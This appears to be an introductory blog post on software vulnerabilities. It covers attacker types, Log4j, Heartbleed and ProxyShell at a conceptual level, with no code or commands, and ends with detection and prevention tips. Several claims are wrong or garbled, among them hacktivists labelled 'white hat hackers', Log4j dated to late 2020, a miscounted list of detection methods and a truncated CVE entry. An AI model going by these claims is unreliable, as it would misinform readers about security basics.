Zero Day Exploits


Introduction


Nowadays, being educated about basic terms related to cybersecurity is a must for all since cybercrimes are increasing exponentially. In today’s blog, we shall be demystifying the term vulnerability.

What is it all about?



According to UPGuard.com, In cybersecurity, a vulnerability is a weakness that can be exploited by cybercriminals to gain unauthorized access to a computer system. After exploiting a vulnerability, a cyberattack can run malicious code, install malware and even steal sensitive data. In simple words, vulnerabilities are the loopholes in a software which can be easily exploited and used for unfair means if the the problem is left untreated, or in technical terms, until and unless the company comes up with a “patch” or a software update. One of the reasons why we should always keep our systems and software's updated to the latest format. However, security vulnerabilities are often not discovered straight away. In recent years, hackers have been faster at exploiting vulnerabilities soon after discovery.

The villains



The people who exploit the vulnerability for their personal gains are malicious actors who are generally-
  • Cybercriminals – Most black hat hackers. Their motivation is usually financial gain
  • Hacktivists –These are the hackers motivated by a political or social cause who want the attacks to be visible to draw attention to their cause also called the “white hat hackers”.
  • Corporate espionage – Consists of those who spy on companies to gain information about them
  • Cyberwarfare – Sometimes countries or political actors spying on or attacking another country's cyberinfrastructure also exploit these vulnerabilities and use it to wage an attack on their nemesis affecting millions of residents.

The Victims



Hackers generally target the following when they exploit these vulnerabilities be it in the form of large scale zero-day attacks or some banking fraud:

  • Individuals who use a vulnerable system, such as a browser or operating system Hackers can use security vulnerabilities to compromise devices and build large botnets.
  • Individuals with access to valuable business data, such as intellectual property
  • Hardware devices, firmware, and the Internet of Things
  • Large businesses and organizations
  • Government agencies
  • Political targets and/or national security threats
  • Some real life examples of vulnerabilities

1.Log4J vulnerability


Log4j is a Java-based logging library included in Apache open source project. This software is publicly accessible and used to collect and store records of activity on a server. The log4J feature in java is used mainly used for error tracing and debugging and is open source. This java logging library, looks up for logs and troubleshoot. Most companies have been using this library indirectly(60+%) since last 20 yrs. The major issue of concern is that any java application using this library can be hacked. 

This vulnerability was found in late 2020,thought it might be exploited way before. CVSS score by Apache(common vulnerability scoring system)rated this as 10/10 as it enables RCE(remote code execution)allows hackers to run any code they want into our server. using RCE, Remote code execution in short. This vulnerability has been tagged as the “single biggest, most critical vulnerability of the last decade” and was reported to Apache by Alibaba on November 24,2021.

Some of the affected companies which had to face the consequences of this unpatched vulnerability are cloudfare ,i cloud, Minecraft:Java edition, steam, Tencent and twitter .

2. Heartbleed Vulnerability



The heartbleed bug in OpenSSL(runs on 66% of internet)is probably the largest most pervasive (and most dangerous) software vulnerability ever discovered root of heartbleed clocking a CVSS score of 10. the SSL standard includes a heartbeat option, which allows a computer at one end of an SSL connection to send a short message to verify that the other computer is still online and get a response back.

Our Web Browser needs to check and verify credentials, for safety companies use Open SSL which translates the user info into codes which can be interpreted by the browser and the company server only, but at the same time, side by side a second conversation occurs called heartbeat to check if the credentials are correct. The servers have to manage a lot of these requests called the socket request which gets difficult to maintain, so the servers close the socket connection to save time and resources. To confirm their presence the web browsers send a heatbeat request which is essentially the heart of the heartbleeed problem. Heart beat is a special data packet, containing 1kb to 64Kb of data. 

If the user server sends heartbeat message of 1KB data, the website server responds with a he same amount of data ie 1KB..Now the website server has to respond with 64KB of data to verify if 64KB of data is being sent to the website browser which would include 1KB of the data sent via heartbeat message and other 63KB would be collected from the servers memory. 

The memory could be garbage memory or some valuable memory like username or password. Problem is that this vulnerability can be exploited over and over again, i.e we can send innumerable heartbeat requests with false data count and the probability to be able to extract sensitive user info. Some of the companies which were affected by this vulnerability are Tumblr, Google, Yahoo, Intuit (makers of TurboTax), Dropbox, Netflix and Facebook. Amazon.com was not affected, but Amazon Web Services, which is used by a huge number of smaller websites, was affected.

3. Microsoft Exchange ProxyShell vulnerability



The vulnerabilities lie in the Microsoft Client Access Service (CAS), (which is commonly exposed to the public internet). Microsoft Client Access Service (CAS), allows its users to access email via mobile devices and web browsers Proxy-shell is the umbrella name which covers three dangerous vulnerabilities in Microsoft exchange. This vulnerability enables anyone to bypass the authentication and execute and access remote code execution as a privileged user. These vulnerabilities are capable of leaking sensitive information about the users such as user distinguished name(DN) when exploited. By using leaked DN and SID, the attacker creates a mailbox that contains a draft email with a a malicious payload as attachment. Afterwards, the mailbox and the contained payload are exported to a web-accessible directory or another directory on the host. By exploiting these vulnerabilities, he hacker can perform remote code execution.

Microsoft Vulnerabilities:

- CVE-2021-34473 — a pre-auth patch confusion issue that results in ACL bypass
- CVE-2021-34523 — an elevation of privilege flaw on the Exchange PowerShell backend
- CVE-2021-31207 — a post-auth arbitrary

How Companies Detect Vulnerabilities



In order to make their systems and software's foolproof, companies are always on the lookout for any vulnerabilities so that they can fix the issue and patch it as soon as possible to prevent any losses to it’s consumers. Some of the techniques followed by them include-

1. Using existing databases of malware and how they behave as a reference.

Although these databases are updated very quickly and can be useful as a reference point, by definition, zero-day exploits are new and unknown. So there’s a limit to how much an existing database can tell you.

2. Signature-based detection

This method employs existing malware databases and their behavior as a reference when scanning for threats; it is possible to use the signatures to detect previously unknown vulnerabilities or attacks.

3. Hybrid detection

This technique merges the above three techniques to take advantage of their strengths while minimizing their weaknesses.

4.Statistics-based detection:

Increasingly, machine learning is used to detect data from previously recorded exploits to establish a baseline for safe system behavior based on data of past and current interactions with the system. The more data which is available, the more reliable detection becomes. Employing machine learning to gather data from previously discovered exploits and generate a baseline for dependable system behavior. While this method has limited effectiveness, it usually works well in a hybrid solution.

Ways to Prevent Vulnerabilities-



We can prevent our software from being exploited by hackers by adopting some basic safety features.

1. Upgrading to the latest version of software

Developers keep on working towards fixing vulnerabilities and unforeseen bugs and often manage to come up with patches by bringing new software and updates. Keeping up to date ensures you are more secure

2. Turning on firewall and installing antivirus

Make sure each of your business’s computers is equipped with antivirus software and antispyware and updated regularly. Such software are readily available online from a variety of vendors. All software vendors regularly provide patches and updates to their products to correct security problems and improve functionality. Firewalls provide protection against outside cyber attackers by shielding your computer or network from malicious or unnecessary network traffic. Firewalls can also prevent malicious software from accessing a computer or network via the internet.

3. Keeping strong passwords

Make sure all your passwords meet the following requirements

  • 10 characters or more
  • At least one uppercase letter
  • At least one lowercase letter
  • At least one number
  • At least one special character

4. Not opening suspicious emails which might be potential phishing scams

Don’t click on a link or email if it:-

1.Seems urgent for no reason

2.Uses language or grammar that doesn’t feel right or familiar

3. Asks for sensitive information

Conclusion


As of Dec. 9, 2021, the number of vulnerabilities found in production code for the year is 18,400. Breaking down that statistic for 2021 so far, NIST recorded 2,966 low-risk vulnerabilities, 11,777 medium-risk ones, and 3,657 of a high-risk nature. For 2020, the number of total vulnerabilities was 18,351.Hence,it’s important to have a basic knowledge about the issue of vulnerabilities. We hope that our blog was able to throw some light over the vulnerabilities in the cybersecurity world.

Authors:

Dhriti Dey
Atharv Agarwal

0 Comments